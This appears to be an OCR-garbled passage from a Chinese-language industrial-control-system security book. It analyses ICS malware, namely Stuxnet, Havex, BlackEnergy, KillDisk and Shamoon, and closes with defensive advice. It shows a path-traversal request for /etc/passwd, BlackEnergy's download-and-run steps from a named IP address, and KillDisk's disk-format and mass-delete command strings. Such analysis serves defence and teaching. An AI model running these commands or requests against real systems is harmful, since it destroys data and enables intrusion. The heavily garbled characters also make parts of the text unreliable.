外 的 其 他 文件 的 请 求 。 当 访问 一 个 使 用 PHP 语 言 开 发 的 网 站 时 ， 通 常会 请 求 某 一 脚本 ,例如 http://mysite.comweb-app.php?file=expectedpage.html。 但 是 ， 
如 果 攻 击 者 利用 包含 漏洞 ， 那 么 他 可 能 会 执行 以 下 请 求 : 


http://mysite.com/web-app.php?file=../../../../etc/passwd 


然后 ， 浏 览 器 会 向 攻击 者 呈现 一 个 文本 文件 ， 该 文本 文件 中 涵盖 了 可 以 登录 到 机 器 的 用 户 的 相关 信息 。 


8.2 ”工控 系统 恶意 代码 分 析 


工控 系统 恶意 代码 是 恶意 代码 中 一 个 较为 复杂 的 子 集 。 由 于 理解 悉 意 软件 功能 希 要 特定 知识 和 专业 技能 ， 这 使 得 逆向 工程 师 对 恶意 代码 进行 剖析 的 工作 更 加 
难以 开展 。 而 对 于 哪些 恶意 代码 族 确实 具有 “类 工控 系统 ”功能 ， 哪 些 不 具有 “类 工控 系统 ”功能 通常 存在 误解 。 本 节能 够 帮助 读者 了 解 具有 同 工 控 系 统 相 类 似 
功能 的 恶意 代码 族 、 木 马 化 的 工控 系统 软件 、 它 们 的 影响 以 及 部 分 已 经 公开 的 恶意 代码 的 有 天 信息 。 请 记 住 ， 我 们 在 此 不 对 攻击 者 的 身份 做 出 猜测 。 


8.2.1 ”实验 环境 


当 分 析 工 控 系 统 相 天 的 恶意 代码 时 ， 重 要 的 是 在 于 理解 恶意 代码 的 多 种 变 体 均 要 求 工控 系统 活动 组 件 和 设备 处 于 正常 的 工作 状态 。 工 控 系 统 恶意 代码 实现 复 
杂 ， 包 含 针 对 特定 目标 协议 、PLC 或 者 服务 的 代码 。 配 备 工控 系统 实验 室 能 够 适应 这 些 复杂 性 从 而 开展 对 恶意 代码 的 测试 。 对 此 需要 考虑 以 下 诸多 因素 : 


- 具备 开展 有 恶 意 代 码 测 试 的 物理 硬件 ， 而 非 虚 拟 环 境 ， Bd E Eo 

` 至 少 配 备 三 家 PLC 厂 商 的 设备 。 包 括 主 要 厂商 的 典型 设备 ， 包 括 : 

Siemens $7-1200 

- Allen-Bradley MicroLogix1100 

- GE FANUC PLC 

- 尽 可 能 涵盖 更 多 的 人 机 界面 软件 程序 。 某 些 恶 意 代码 只 针对 特定 的 人 机 界面 应 用 程序 与 (或 ) 人 机 界面 项 目 文件 。 

- 至 少 配 备 一 台 物 理 人 机 界面 主机 ， 并 安装 有 正常 运行 的 软件 。 如 果 需 要 ， 可 以 将 这 些 人 机 界面 软件 都 放 在 中 央 服 务 器 上 以 降低 成 本 。 


` 在 环境 中 生成 真实 的 数据 ， 例 如 标签 信息 。 在 实验 过 程 中 ， 通 常 可 以 使 用 定制 脚本 来 生成 准确 和 真实 的 数据 ， 保 证 恶意 代码 相信 自身 运行 在 真实 的 SCADA 
环境 中 。 


针对 特定 工控 系统 的 恶意 代码 实验 室 环境 高 级 逻辑 部 署 如 图 8-7 所 示 。 
8.2.2 Stuxnet 


Stuxnet ( 震 网 病毒 ) 通常 被 看 作 世 界 上 第 一 款 针对 PLC 的 “网 络 武器 ”， 于 2010 年 被 首次 发 现 。Stuxnet 对 多 个 国家 的 Siemens PCS7、S7PLC 以 及 WinCC 
系统 实施 了 攻击 。 Stuxnet 非 常 有 趣 ， 因 为 它 的 开 友 者 相当 谨 愤 ， 只 感染 和 影响 目标 系统 ， 而 不 对 其 他 系统 产生 影响 。 束 相当 于 战场 上 的 一 名 狙击 手 ， 如 果 没 有 找 
到 并 识别 预定 目标 ， 则 一 直 静 待 时 机 。Stuxnet 的 开发 过 程 用 到 了 多 种 不 同 语言 ， 包 括 C 和 C++。 此 外 ，Stuxnet 还 利用 了 四 个 0-day 汤 洞 ， 考 虑 到 每 个 0-day 汤 洞 
的 价值 ，Stuxnet 的 出 现 非 比 寻 常 。 以 下 是 它 所 利用 的 漏洞 : 


互联 网 


互联 网 进出 
连接 过 滤 


工业 实时 历史 数据 库 


人 机 界面 服务 大 


环境 管理 日 志 环 境 


图 8-7 工控 系统 恶意 代码 实验 室 
- CVE-2010-2729 ”打印 后 人 台 服 务 远程 代码 执行 漏洞 
- CVE-2010-2568 LNK 或 PIF 文 件 任 意 代 码 执 行 漏洞 
- CVE-2010-2772 Siemens Simatic WinCC 与 PCS7 硬 编码 口令 权限 许可 和 访问 控制 漏洞 
- CVE-2008-4250 Windows servet 服 务 RPC 请 求 远程 代码 执行 漏洞 


Stuxnet 感 染 了 许多 不 同 的 生产 业务 站 点 ， 其 中 包括 伊朗 核 浓缩 项 目 。 截 至 2010 年 年 底 ，Stuxnet 已 经 感染 了 大 约 100000 台 主机 。 目 前 ,发现 有 六 个 国家 受 
到 了 影响 ， 其 他 国家 尚未 确认 (http://www.symantec.com/content/en/us/enterprise/media/security response/white- 
papers/w32_stuxnet_dossier.pdf) 。 表 8-1 列 出 了 按照 国家 划分 的 被 感染 计算 机 所 占 的 百分比 。 


表 8-1 感染 主机 在 不 同 国家 分 布 的 比例 


家 家 感染 主机 比例 
印度 俄罗斯 0.61% 


Stuxnet 病 毒 共 由 三 个 模块 组 成 : 一 个 蠕虫 模块 和 两 个 攻击 载荷 模块 。Stuxnet 通 常 经 由 U 盘 或 者 外 接 硬盘 进入 工控 环境 。 一 旦 插入 受 感染 的 介质 ，Stuxnet 的 
蠕虫 模块 就 开始 在 环境 中 查找 所 有 正在 运行 Siemens Step7 软 件 的 系统 。Stuxnet 使 用 诸如 基于 点 对 点 的 RPC 通 信 (https://en.wikipedia.org/wiki/Peer-to- 
peer) 之 类 的 技术 进行 搜索 查找 ， 从 而 规避 了 系统 在 可 能 没有 连接 互联 网 而 无 法 进行 搜索 的 情况 。 如 果 在 环境 里 所 有 与 之 连接 的 系统 中 均 没 有 找到 Step7 软 件 ， 
那么 Stuxnet 将 进入 休眠 状态 ， 之 后 重新 在 环境 中 进行 扫描 。 在 识别 出 Step7 软 件 的 情况 下 ， 则 选择 某 一 个 攻击 载 答 或 者 将 某 两 个 攻击 载 信 加 以 组 合用 以 执行 。 


在 Stuxnet 病 毒 包含 的 两 个 攻击 载荷 中 ， 一 个 攻击 载荷 实施 对 Siemens S7-315-2PLC 的 攻击 ， 该 设备 主要 在 控制 伊朗 离心 机 的 高 频 驱 动 器 中 使 用 。 另 一 个 鲜 
为 人 知 的 攻击 载荷 则 在 PLC 中 开展 中 间 人 攻击 (Man-in-The-Middle, MiTM) 。 该 攻击 载 答 接收 所 有 针对 PLC 中 /OO 模块 的 输入 ， 并 对 其 进行 仿造， 导致 PLC 中 
的 所 有 次 辑 都 按照 错误 的 逻辑 执行 。 然 后 由 该 攻击 载 谷 告诉 PLC 开 展 哪 些 工 作 ， 而 不 是 由 PLC 根 据 系 统 自身 的 钦 辑 开展 后 续 工作 。 这 是 第 一 次 有 有 恶意 软件 实现 对 被 
算 改 PLC 代 码 的 隐藏 ， 这 也 使 得 Stuxnet 成 为 了 第 一 个 “PLC rootkit” , 


1.Stuxnet 如 何 规避 安全 控制 


Stuxnet 病 毒 使 用 多 种 机 制 规避 防御 性 的 安全 控制 。 首 先 ，Stuxnet 采 用 了 0-day 漏 洞 同 已 知 漏洞 相 结 合 的 方式 来 对 抗 安全 控制 措施 。 不 幸 的 是 ， 出 于 多 种 原 
因 ， 许 多 3CADA 环 境 都 没有 打 补 丁 ， 因 此 即便 是 非常 普通 的 漏洞 也 能 够 在 系统 中 成 功利 用 。 除 了 利用 0-day 漏 洞 和 其 他 漏洞 ，stuxnet 病 毒 还 使 用 了 知名 公司 的 合 
法 证 书 来 帮助 规避 检测 。 在 这 些 合法 证 书 的 帮助 下 ， 攻 击 载 答 被 伪 涂 成 正常 的 应 用 程序 ， 成 功 欺 驴 了 大 多 数 安防 程序 。 


2.Stuxnet 的 通信 与 传播 方法 


Stuxnet 病 毒 还 使 用 了 一 种 有 趣 的 通信 与 传播 方式 ; 这 种 方式 依赖 于 点 对 点 通信 。 攻 击 者 知道 他 们 的 主要 目标 可 能 不 与 互联 网 相连 接 。 为 了 适应 这 一 
扎 ，Stuxnet 可 以 接收 来 自 同 工 控 网 络 相连 接 的 计算 机 所 构成 的 上 各 对 点 网 络 的 命令 。 当 Stuxnet 感 染 一 台 机 器 时 ， 安 六 并 启动 RPC 服 务 器 ， 然 后 监听 所 有 传 入 的 连 


妆 。 所 有 其 他 被 渗透 的 机 器 都 可 以 抵达 该 RPC 服 务 器 ， 同 样 ， 被 感染 主机 也 可 以 到 达 所 有 其 他 被 渗透 的 主机 。 当 一 台新 主机 上 线 时 ， 就 会 在 该 主机 上 安装 相应 版 
本 的 Stuxnet。 如 果 版 本 老 | 日 ，Stuxnet 则 会 自行 升级 到 最 新 版 本 。 


工业 网 络 只 需要 存在 一 条 到 互联 网 的 连接 ， 然 后 该 连接 会 友 送 命令 到 Stuxnet， 整 个 过 程 中 被 感染 的 机 器 无 需 同 互 联网 建立 连接 。 


此 外 ，Stuxnet 病 毒 还 可 以 通过 Windows 管 理 规范 (WMI) 服务 进行 传播 。Stuxnet 有 一 部 分 功能 就 是 枚 举 计算 机 及 域 中 的 所 有 用 户 ， 然 后 党 试 连接 所 有 可 
用 的 网 络 资源 。Stuxnet 还 会 确定 ADMIN$ 共 享 能 否 用 于 远程 安装 。 在 榴 举 远程 目录 之 后 ，Stuxnet 以 随机 文件 名 进行 命名 并 复制 到 远程 目录 。 


有 关 Stuxnet 病 毒 的 更 多 详细 信息 ， 请 参阅 Symantec 发 布 的 W.32Stuxnet 文 档 


(http://www.symantec.com/content/en/us/enterprise/media/security response/whitepapers/w32 stuxnet dossier.pdf) 。 


8.2.3 Flame 


2012 年 首次 发 现 的 Flame 亚 意 代 码 (火炮 病毒 ) 主要 针对 伊朗 、 巴 勒 斯 坦 、 以 色 列 、 苏 丹 、 叙 利 亚 、 黎 巴 嫩 、 沙 特 阿 拉 伯 和 埃及 各 地 的 目标 发 起 攻击 ， 意 图 
进行 信息 窃取 。Flame 的 有 趣 之 处 在 于 它 融 像 恶意 代码 中 的 “瑞士 军刀 ”一 样 。 可 以 把 Flame 看 作 一 个 强大 的 有 恶意 代码 工具 集 ， 其 代码 规模 超过 20MB， 因 此 能 够 
提供 多 种 强大 的 功能 。 由 于 该 恶意 代码 是 模块 化 的 ， 所 以 恶意 代码 的 开发 者 可 以 轻松 地 实现 对 其 功能 和 交互 性 的 改动 。 


Flame 的 开发 具有 针对 性 ， 利 用 了 多 种 感染 途径 ， 例 如 USB 感 染 、 打 印 机 共享 、 文 件 共享 传播 以 及 域 控 制 器 。 除 了 刚刚 列 出 的 感染 方式 ,现实 中 的 感染 途径 
还 包括 鱼 叉 式 网 络 钓 鱼 邮件 和 水 坑 攻 击 。 


Flame 采 用 了 五 种 加 密 技术 ， 并 将 所 搜集 的 与 系统 有 关 的 所 有 信息 都 存储 在 本 地 SQLite 数 据 库 中 ， 以 保持 数据 高 度 结构 化 并 且 方 便 导 出 。 融 目前 来 看 ， 尚 未 
有 报告 提 及 工控 系统 环境 感染 Flame。 从 表面 上 来 看 ， 该 恶意 代码 工具 并 非 针 对 工控 系统 ; 然而 ， 对 Flame 感 到 忧心 的 主要 是 工业 部 门 ， 尤 其 是 能 源 部 门 。 


8.2.4 Havex 


Havex 是 一 种 在 多 个 不 同行 业 和 环境 中 广泛 使 用 和 分 发 的 恶意 代码 。 然 而 ，Havex 的 不 同 之 处 在 于 ， 它 是 第 一 款 公开 已 知 的 能 够 对 SCADA 协 议 进 行 主动 扫描 
的 恶意 代码 ， 即 基于 过 程控 制 的 对 象 链接 与 伐 入 (OPC) 通信 协议 。Havex 最 初 开发 用 作 一 款 简单 的 PHP 远 程 访问 木马 (RAT) ， 该 木马 针对 多 种 目标 都 是 非常 
有 效 的 。 


自 2014 年 中 期 以 来 ， 威 胁 发 起 方 一 直 使 用 Havex 对 本 地 环境 中 所 有 采用 OPC 标 准 协议 作为 通信 协议 的 服务 器 或 客户 端 进行 感染 和 扫描 。Havex 的 感染 生命 
期 如 图 8-8 所 示 ， 在 其 他 样本 中 观察 到 的 Havex 变 体 的 感染 生命 周期 与 此 图 略 有 差异 。 


PW 代码 
释放 器 


感染 
(PIE 


水 坑 或 者 
木马 ) 


与 认证 
信息 采集 


图 8-8 Havex 的 感染 生命 周期 


在 图 8-8 中 提 到 的 感染 生命 周期 中 ， 攻 击 者 在 感染 阶段 和 针对 OPC 协 议 的 SCADA 扫 描 阶 段 均 使 用 了 Havex。 攻 击 者 首先 从 被 感染 的 机 器 中 提取 联系 人 。 其 中 
Microsoft Outlook 被 看 作 是 提取 的 主要 目标 。 提 取出 Outlook 联 系 人 后 ， 攻 击 者 将 提取 系统 信息 ， 包 括 主 机 名 、1P 地 址 以 及 用 户 帐户 信息 。 然 后 进行 OPC 协 议 扫 
描 ， 这 是 本 节 讨 论 的 Havex 恶 意 代码 的 关键 所 在 。 最 后 ， 对 SAM 数 据 库 进行 转 储 并 导出 数据 以 便 进 行 离线 口令 破解 。 


1.Havex 的 感染 途径 
专门 针对 OPC 协 议 的 Havex 变 体 用 到 了 木马 化 的 工控 系统 软件 安装 程序 和 软件 : 
- eWon2 4] #9 eCatcherek ft 专门 针对 Talk2M eCatcher4.0.0.13073， 如 图 8-9 所 示 (恶意 代码 散 列 值 : eb0dacdc8b346f44c8c370408bad4306) 
. MESA Imaging 公 司 的 Swiss Ranger softwares + ”专门 针对 Swiss Ranger1.0.14.706 (libMesaSR) (恶意 代码 散 列 值 : e027d4395d9ac9cc980d6a91122d2d83) 
- Connect Line GmbH 公 司 的 mbCONFTOOL 软 件 专门 针对 mbCONFTOOLv1.0.1 (恶意 代码 散 列 值 : 0a9ae7fdcd9a9fe0d8c5c106e8940701) 
- Connect Line GmbH 公 司 的 mbCHECK 软 件 专门 针对 mbCHECK v1.1.1 (恶意 代码 散 列 值 : 1d6b11f85debdda27e873662e721289e) 
2. 木 马 化 eCatcher 软 件 的 设置 安装 


木马 化 的 软件 安装 程序 ( 见 图 8-9) 通过 三 商 自己 的 网 站 进行 发 布 ， 而 这 些 网 站 随后 被 渗透 入 侵 。 特 定 文件 PE.dll (恶意 代码 散 列 值 : 
6bfc42f7cb1364ef0bfd749776ac6d38) 是 一 个 负责 对 OPC 服 务 器 、 客 户 端 以 及 通信 等 内 容 进 行 扫描 的 插件 。 该 插件 的 扫描 功能 仅 能 够 在 本 地 被 感染 的 主机 以 及 
与 之 连接 的 网 络 中 发 挥 作用 。 


r= 


Setup - eCatcher 


Welcome to the eCatcher Setup 
Wizard 


This will install eCatcher version eCatcher 4.0.0, 13073 on your 
computer, 


It is recommended that you dose all other applications before 
continuing. 


Click Next to continue, or Cancel to exit Setup, 


Next > | | Cancel 


图 8-9 ”eCatcher 安 装 程序 


除了 木马 化 的 软件 安装 程序 ，Havex 变 体 的 其 他 感染 途径 还 包括 鱼 叉 式 网 络 钓鱼 邮件 和 水 坑 攻 击 。 鱼 叉 式 网 络 钓鱼 邮件 包含 利用 PDF/SWF 文 件 漏洞 (CVE- 
2011-0611) 的 Havex 代 码 。PDF 文 件 用 于 释放 包含 Havex DLL 攻击 载荷 的 XML 数据 包 。 此 外 ，PDF 文 件 中 还 包含 两 个 加 密 文 件 ， 分 别 是 Havex DLL 和 用 于 执行 
Havex DLL 的 JAR 文 件 。 在 这 一 过 程 结束 时 ， 通 常 需要 执行 shellcode 代 码 ， 使 得 攻击 者 能 够 访问 被 感染 的 机 器 并 在 该 环境 中 长 期 驻 留 。 


扫描 功能 由 调用 runDLL 的 导出 消 数 开始 。 恶 意 代 码 使 用 WNet 消 数 识 别 是 否 正在 使 用 OPC 协 议 。 然 后 ， 扫 描 器 收集 所 有 已 识别 出 采用 OPC 协 议 的 可 用 主机 列 
表 ， 并 将 该 列表 输出 为 文本 文件 ， 和 存放 在 启动 扫描 器 的 主机 的 桌面 。 


当 PE.dl| 执 行 时 ， 它 会 将 OPC 服 务 器 数据 保存 为 %TEMP%\[random].tmp.dat 文 件 。 此 外 ， 还 会 将 OPC 服 务 器 扫 摘 的 详细 信息 保存 
为 %TEMP%\OPCServer[lrandom].txt 文 件 。 有 恶意 代码 执行 完 后 ， 上 述 两 个 文件 均 不 会 删除 。 


8.2.5 BlackEnergy 


BlackEnergy 是 一 款 特别 讨厌 的 恶意 代码 ， 在 这 个 星球 上 已 经 横行 多 年 。BlackEnergy 最 初 被 归 为 犯罪 软件 工具 ， 于 2013 年 中 期 才 开 始 在 定向 攻击 中 使 用 。 由 
于 BlackEnergy 代 码 实现 复杂 ， 因 此 使 得 对 其 自身 及 插件 的 逆向 分 析 过 程 相当 困难 。 


B 


当前 存在 多 个 版 本 的 BlackEnergy， 我 们 只 对 其 中 包含 SCADA 功 能 的 几 个 版 本 感 兴趣 。 在 这 种 情况 下 ， 已 验证 具有 SCADA 功 能 的 版 本 是 版 本 2.0 和 3.0。 
1.BlackEnergy 的 感染 途径 


与 大 多 数 恶意 软件 感染 过 程 一 样 ， 对 于 针对 特定 SCADA 环 境 的 BlackEnergy 版 本 ， 主 要 通过 可 用 并 且 直 接 与 互联 网 相连 的 系统 实现 对 特定 SCADA 环 境 的 感 
染 。 漏 洞 2014-0751 现 在 已 经 广为人知 ， 但 是 自 2012 年 年 中 开始 ， 攻 击 者 就 已 经 利用 该 漏洞 了 ， 而 当时 该 漏洞 尚未 公开 发 布 也 未 打上 补丁 。 由 于 系统 之 间 通 过 互 
联网 相连 接 ， 因 此 利用 该 漏洞 ， 攻 击 者 能 够 远程 执行 恶意 的 GE Cimplicity 文 件 (.cim) 。 最 终 , 一 共用 到 了 两 个 .cim 文 件 ,分别 是 : devlist.cim 和 config.bak。 


Devlist.cim (有 恶意 代码 散 列 值 ;: 59e41a4cdf2a7d37ac343d0293c616b7) ” 当 打 开 dev-list.cim 时 ， 脚 本 从 I1P 地 址 为 94.185.85.122 的 站 点 下 载 文 件 news- 
feed.xml， 之 后 生成 文件 名 字符 串 包含 41 个 字符 的 .wsf 文 件 ( 即 <41character string>.wsf) ， 接 着 脚本 执行 并 下 载 一 个 名 为 category.xml 的 文件 ， 该 文件 保存 
到 被 感染 主机 的 有 效 Cimplicity 目 录 中 。 这 个 名 为 “CimWrapPNPS.exe” 的 文件 就 是 实际 的 BlackEnergy 安 装 程序 。 程 序 执行 后 ，Cim-WrapPNPS.exe 执 行 自 删 


除 操作 。 图 8-10 显 示 了 devlist.cim 文 件 的 布局 。 


devlist. 
cim | 


newsteed. xml 


<4] characters>. 
wst 


Category.xml 
<renamed> 


BlackEnergy > CimWrapPNPS.exe 


Plugins 


图 8-10 BlackEnerey 中 devlist.cim 文件 的 布局 


config.bak (恶意 代码 散 列 值 : c931be9cd2cobd896ebe98c9304fea9e) config.bak 意 图 下 载 并 执行 BlackEnergy 的 攻击 载 集 ， 也 就 是 default.txt 文 件 。 
config.bak 执 行 时 将 default.txt 保 存 到 %CIMPATH\CimCMSafegs.exe 中 ， 其 中 %CIMPATH 是 GE 公司 的 人 机 界面 程序 Cimplicity 所 创建 的 环境 变量 。 但 最 
后 ，CimCMSafegs.exe 就 是 BlackEnergy。 该 文件 从 94.185.85.122\public\default.txt 下 载 得 到 。Black-Energy 中 config.bak 文 件 的 布局 如 图 8-11 所 示 。 


default.txt 
<renamed> 


BlackEnergy ` CimCMSafegs. 
3 exe 


图 8-11 BlackEnerey 中 config.bak 文件 的 布局 
2.BlackEnergy 与 乌克兰 


2015 年 12 月 下 旬 ， 乌 克 兰 伊 万 诺 - 弗 兰 科 夫 斯 克 地 区 过 半 的 居民 区 太 生 了 停电 事故 。 而 电力 中 断 的 原因 则 归结 为 网 络 攻 击 ， 并 广泛 推测 该 攻击 涉及 恶意 代 
码 。 这 是 一 个 历史 性 事件 ， 因 为 它 是 第 一 起 由 网 络 攻击 所 造成 的 电力 中 断 事 件 ， 特 别 是 如 果 恶 意 代 码 确 实 也 参与 其 中 的 话 。 


已 知 信息 ， 在 撰写 本 文 的 时 候 ， 乌 克 兰 电力 设施 所 友 生 的 攻击 事件 鲜 为 人 知 。 然 而 ， 借 助 全 球 多 位 研究 人 员 的 分 析 报 告 ， 一 些 信息 才 得 以 公开 。 


BlackEnergy 的 最 近 更 新 包含 了 一 个 名 为 KillDisk 的 模块 ， 访 模块 会 对 操作 系统 中 的 关键 部 分 进行 破坏 。 为 了 造成 系统 无 法 运行 ，KillDisk 模 块 的 主要 功能 是 擦 


除 操作 系统 ， 并 很 有 可 能 会 清除 机 器 或 环境 中 所 有 先前 操作 的 残余 信息 。 虽 然 KillDisk 模 块 并 不 是 很 复杂 ， 但 它 在 擦 除 操作 系统 方面 非常 有 效 。 


KillDisk 模 块 的 代码 相对 简单 ， 看 一 遍 就 很 容易 理解 。 虽 然 尚 不 清楚 该 次 攻击 活动 中 是 否 还 涉及 其 他 组 件 ， 但 很 有 可 能 在 KillDisk 之 前 用 到 了 更 多 的 主动 恶意 代 
码 组 件 。 此 外 ，KillDisk 很 可 能 与 其 他 工具 一 起 配合 使 用 ， 以 增强 攻击 效果 ， 导 致 SCADA 环 境 再 次 上 线 更 加 困难 。 显 然 ， 安 全 团队 要 想 进 行 攻击 事件 响应 并 从 一 系 
列 被 擦 除数 据 的 机 器 上 进行 调查 取证 将 耗费 较 多 的 时 间 ]。 


+08X.tmp 
\\.\%e: 
$st08X%.tmp 

/ce format %c: /Y /OQ 

fe format tc: /Y /X /FS:NTFS 
kernel32.dil 
InitiateSystemShutdownExwW 
InitiateSystemShutdownW 
system32\cmd.exe 
shutdown /r /t %d 

fe del /F /S /Q %c:\ 
IsWow64Process 
_ Wow64DisableWow64FsRedirection 
_ Wow64EnableWow64FsRedirection 

未 知 信息 ”虽然 还 存在 未 知 的 特定 感染 途径 ， 有 人 推测 以 Microsoft Exce 文 档 为 附件 的 鱼 又 式 网 络 钓鱼 邮件 也 是 其 中 之 一 。 然 而 ， 这 种 猜测 并 未 得 到 验证 。 


此 外 ， 尚 不 清楚 KillDisk 是 否 确实 是 导致 乌克兰 电 力 中 断 的 原因 。 昌 然 KillDisk 在 整个 场景 中 的 作用 仍 不 确定 ， 但 这 次 攻击 不 太 可 能 只 是 通过 KillDisk 一 个 模块 造成 
的 。 


8.2.6 ” 伪 丢 为 工控 系统 软件 的 犯罪 软件 


2015 年 年 初 ， 发 现 有 多 款 恶 意 代码 样本 伪装 成 了 正常 的 工控 系统 软件 。 木 马 化 [ 软件 模仿 正常 文件 的 命名 方式 ， 这 在 多 个 人 机 界面 软件 套件 中 较为 常见 


所 有 识别 出 的 样本 都 被 归 类 为 犯罪 软件 ， 这 意味 着 所 有 样本 都 没有 在 国家 支持 的 网 络 攻 击 中 出 现 。 木 马 化 软件 主要 模仿 三 家 厂商 的 产品 ， 它 们 分 别 是 西门 子 
公司 的 WinCC、 ee 从 恶意 代码 中 提取 的 大 部 分 元 数据 同 之 前 提 及 的 厂商 的 元 数据 均 是 匹配 的 ， 如 下 所 示 。 


Copyright Copyright (c) SIEMENS AG 
Publisher SIEMENS AG 
Product SIMATIC WinCC Common Archiving® 


1.Advantech 


在 木马 化 文件 中 ， 总 共有 24 个 样本 采用 了 研华 科技 Advantech 系 列 软件 的 命名 规范 。 下 面 是 来 自 木 马 化 的 Advantech 软 件 中 恶意 代码 样本 Zeus 的 元 数据 。 
Copyright Copyright (C) Advantech Corp. 1996-2003 
Publisher Advantech Automation Corp 


其 中 识别 出 的 大 多 数 恶意 代码 都 是 恶意 代码 Zeus 的 变 体 ， 主 要 用 作 银 行 类 木马 。 图 8-12 显 示 了 恶意 代码 族 的 细 分 结果 。 


2.WinCC 


总 共有 32 个 样本 在 木马 化 的 软件 中 采用 了 西门 子 WinCC 软 件 的 命名 规范 。 与 木马 化 的 Advantech 软 件 类 似 ， 所 有 恶意 代码 似乎 都 是 某 种 类 型 的 银行 类 木马 ， 
其 中 名 为 AlIman 的 恶意 代码 族 ， 在 样本 总 量 中 以 28% 的 占 比 遥遥 领先 ， 如 图 8-13 所 示 。 


图 8-12 采用 Advantech 软 件 命名 规范 的 恶意 代码 族 细 分 结果 


图 8-13 ”采用 WinCC 软 件 命 名 规范 的 恶意 代码 族 细 分 结果 


3.Cimplicity 


木马 化 Cimplicity 软 件 中 的 恶意 代码 也 是 银行 类 恶意 代码 ， 目 前 还 没有 人 迹象 表明 高 级 攻击 者 利用 它 来 达到 不 可 告 人 的 目的 。 总 共有 17 个 样本 采用 了 通用 电气 
Cimplicity 软 件 的 命名 规范 。 使 用 Cimplicity 命 名 规范 的 恶意 代码 族 的 细 分 结果 如 图 8-14 所 示 。 


图 8-14 采用 Cimplicity 软 件 命名 规范 的 恶意 代码 族 细 分 结果 


虽然 攻击 者 的 直接 意图 尚未 揭晓 ， 但 是 他 们 所 针对 的 很 有 可 能 是 安装 了 上 述 软件 的 系统 ， 这 是 因为 ， 通 常安 六 这 些 软 件 的 系统 防护 措施 相对 较 弱 。 而 更 为 糟 
糕 的 是 ， 攻 击 者 已 经 意识 到 了 控制 系统 网 络 和 设备 在 安全 控制 方面 较为 薄弱 ， 因 此 对 正常 控制 系统 软件 的 木马 化 趋势 很 可 能 会 继续 下 去 。 


8.2.7 Shamoon 


Shamoon 虽 然 并 不 直接 针对 工控 系统 环境 ， 但 在 许多 使 用 工控 系统 的 环境 中 确实 产生 了 巨大 的 影响 ， 尤 其 是 能 源 部 门 的 工控 系统 。 于 2012 年 友 现 的 
Shamoon 和 Flame 有 恶意 代码 之 间 存 在 很 多 联系 ， 这 使 得 Shamoon 在 工控 系统 恶意 代码 中 颇 为 引 人 注 目 。 


该 恶意 代码 可 能 是 出 于 网 络 侦察 的 目的 而 开发 的 。shamoon 可 以 很 容易 地 从 一 全 被 感染 的 机 器 传播 到 另 一 合 机器。 一旦 机 器 感染 ， 恶 意 代 码 将 收集 文件 列表 
并 泄漏 给 攻击 者 ， 然 后 这 些 文件 将 从 受害 者 机 器 中 删除 。 在 最 后 阶段 ， 恶 意 代 码 会 覆盖 主 引 导 记 录 (MBR) ， 使 计算 机 由 于 无 法 引导 而 变 成 “砖头 ”， 为 此 需要 
重新 格式 化 机 器 。 在 一 次 披露 的 攻击 事件 中 ， 沙 特 Aramco 公 司 遭 受 了 Shamoon 有 恶意 代码 的 攻击 。 有 3 万 台 机 器 遭受 了 攻击 ， 需 要 多 达 两 周 的 时 间 才 能 够 恢复 服 
务 (https://www.tofinosecurity.com/blog/shamoon-malware-and-scada-security-%E2%80%93-what-areimpacts) 。 然 而 ， 没 有 证 据 表 明 是 恶意 代码 对 
工控 系统 环境 或 设备 造成 了 影响 。 


[1 木马 化 ， 即 将 木马 伪装 为 正常 软件 。 一 译 者 注 


8.3 ”本 章 总 结 


恶意 软件 仪 仅 是 当今 计算 环境 中 人 存在 于 工控 系统 环境 中 的 众多 不 同 威胁 之 一 。 然 而 ， 由 于 恶意 代码 直接 或 者 间接 的 破坏 能 力 ， 恶 意 代 码 确 实 采取 是 众多 威胁 
中 最 令 人 忧心 的 威胁 之 一 。 当 保护 工控 系统 环境 免 遭 恶意 代码 威胁 时 ， 可 以 考虑 采取 以 下 防御 措施 : 


` 在 适当 的 情况 下 ， 对 诸如 人 机 界面 之 类 的 关键 资产 应 采取 应 用 程序 白 名 单 保护 机 制 。 从 而 阻止 不 在 应 用 程序 白 名 单 中 的 应 用 程序 与 (或 ) 恶意 代码 的 执 


` 在 适当 的 情况 下 ， 使 用 反 病 毒 产 品 。 在 处 理 恶意 代码 时 ， 在 控制 网 络 中 说 慎 部 署 防 病毒 解决 方案 能 够 帮助 抵消 部 分 恶意 代码 带 来 的 风险 。 


. 及 早 为 系统 打上 补丁 ， 并 经 常 性 地 搜索 补丁 更 新 。 很 多 恶意 代码 都 会 搜索 并 利用 软件 和 操作 系统 早期 版 本 中 存在 的 漏洞 。 尽 可 能 迅速 且 经 常 性 地 为 这 些 系 
统 打 上 补丁 有 助 于 抵消 恶意 软件 感染 带 来 的 风险 。 


- 封锁 USB 设 备 以 及 其 他 外 部 介质 的 接口 。 恶 意 代 码 通过 USB 设 备 与 外 部 介质 可 以 轻松 地 实现 同 与 互联 网 物理 隔离 的 系统 之 间 的 交互 。 同 样 ， 许 多 恶意 代码 都 


可 以 通过 可 移动 介质 进入 到 工控 环境 当中 。 移 除 这 些 设 备 的 访问 权限 能 够 降低 恶意 代码 进入 控制 系统 网 络 中 最 安全 区 域 的 风险 。 


在 保护 控制 网 络 免 遭 愁 意 代 码 攻击 时 ， 遵 循 基本 的 安全 原则 将 大 大 有 助 于 确保 天 键 系统 不 会 由 于 恶意 代码 的 影响 而 导致 性 能 下 降 。 很 多 原则 已 经 在 第 4 章 和 第 
5 章 中 进行 了 简短 的 介绍 ， 缓 解 策略 将 在 第 10 章 进一步 讨论 。 


8.4 ”延伸 阅读 


e Countdown to Zero Day: Stuxnet and the Launch of the Worids First Digital 
Weapon, by Kim Zetter (Broadway Books, 2015) 


e Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software, 
Ist Edition, by Michael Sikorski and Andrew Honig (No Starch Press, 2012) 


e Malware Analyst’s Cookbook and DVD: Tools and Techniques for Fighting Malicious 
Code, Ist Edition, by Michael Ligh, Steven Adair, Blake Hartstein, and Matthew 
Richard (Wiley, 2010) 


e Hacking Exposed Malware & Rootkits: Security Secrets & Solutions, 2nd Edition, 
by Michael Davis, Sean Bodmer, Aaron LeMasters, and Christopher C. Elisan 
(McGraw-Hill Professional, 2016) 


案例 研究 ”第 四 部 分 : 立足 之 地 


Proph 猜 想 公司 网 络 部 署 了 入 侵 检 测 监 控 ， 因 此 为 了 避免 检测 ， 所 有 针对 本 地 网 络 的 扫 摘 和 枚 举 速 度 都 非 钊 缓慢 并 且 相 当 受 限 。 利 用 现 有 市 面 上 的 扫描 器 进 
